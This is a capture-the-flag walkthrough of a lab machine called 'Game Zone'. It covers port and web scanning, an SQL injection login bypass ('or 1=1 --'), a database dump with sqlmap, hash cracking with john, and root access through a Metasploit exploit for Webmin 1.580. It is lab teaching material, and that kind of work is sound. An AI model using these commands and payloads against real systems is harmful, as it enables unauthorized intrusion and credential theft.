Quick recon according to logo and info :
- Linux ;
- Misc: SSH, SQLi (which means a web server).
Let’s start a full
nmap scan :
sudo nmap -T4 -A -p- -oA scan $target_ip
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 11:38 CET Nmap scan report for $target_ip Host is up (0.033s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA) | 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA) |_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Game Zone No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/22%OT=22%CT=1%CU=42887%PV=Y%DS=2%DC=T%G=Y%TM=603389C OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1 OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 33.34 ms 10.11.0.1 2 33.56 ms $target_ip OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.63 seconds
Not much to see here :
ssh. Not much in
searchsploit either. Let’s directly run our usual web scanners and manually browse the website with
Burp in the meantime.
nikto -h http://$target_ip
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: $target_ip + Target Hostname: $target_ip + Target Port: 80 + Start Time: 2021-02-22 11:52:39 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Cookie PHPSESSID created without the httponly flag + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + IP address found in the 'location' header. The IP is "127.0.1.1". + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1". + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 7863 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2021-02-22 11:58:11 (GMT1) (332 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
gobuster dir -u http://$target_ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -t 200 -x .php
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://$target_ip [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php [+] Timeout: 10s =============================================================== 2021/02/22 11:53:03 Starting gobuster =============================================================== /portal.php (Status: 302) /index.php (Status: 200) /images (Status: 301) =============================================================== 2021/02/22 11:53:48 Finished ===============================================================
Like we could guess, there is not much information from our scanners.
However, manual browsing revealed a
login and a search form. Since we are working on SQLi, they are most probably vulnerable!
It doesn’t seem the search function is working (none of our request displayed in Burp show the search term), and we’ll try to exploit the authentication box.
Let’s just try to use
' or 1=1 -- (there is an extra space at the end as username and a blank password, and we are in!
We now access to another search function, which this time, seems to be working, because this time, we notice that the search term in our Burp Request :
We will save this request as
req.txt for a latter use.
It is now time to use our new saved request, in order to try to dump the credentials :
sqlmap -r req.txt
It will quickly tell us the DB appears to be
MySQL. Cancel this scan and launch it again with the new gathered info in order to dump the DB :
sqlmap -r req.txt --dbms=mysql --dump
We now save our hash into hash.txt, and we can use various online resources to detect the hash type. OUr is
Then we run :
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
And it’ll give us the password :
Getting Initial Shell
We can now log in via SSH with our new-found credentials :
Let’s harvest user flag :
As usual, I’ll upload
lse.sh on the server and run it in order to see if there is anything I could exploit to elevate my privileges. I didn’t find anything obvious, so I’ll now upload and run
linpeas.sh as well!
We notice that
webmin is installed and version is
1.580, which is vulnerable to
webmin being a tool for system administration via a website, it might be a great place to start looking.
First, we will set up an SSH tunnel in order to access
Webmin from our attacking box :
ssh -L 10000:127.0.0.1:10000 [email protected]$target_ip
Then, we can check it worked with
curl -I 127.0.0.1:10000 which should returns a
200 status code.
As far, as I’d like to complete this without
MetaSploit, it seems I am stuck! I found this repo, for a manual exploitation. However, it is a Python2 script, and it seems some modules are deprecated… which might why I am not able to connect back to my listener :
So… We now, run
msfconsole and use
unix/webapp/webmin_show_cgi_exec, set the required options and run it. Boom! We have a shell :
And we harvest our root flag :
Another fun box, and the first to have some “real” web vuln! One could argue that misconfiguration is also totally a “real” vuln, it was refreshing to see a more generic way to break in.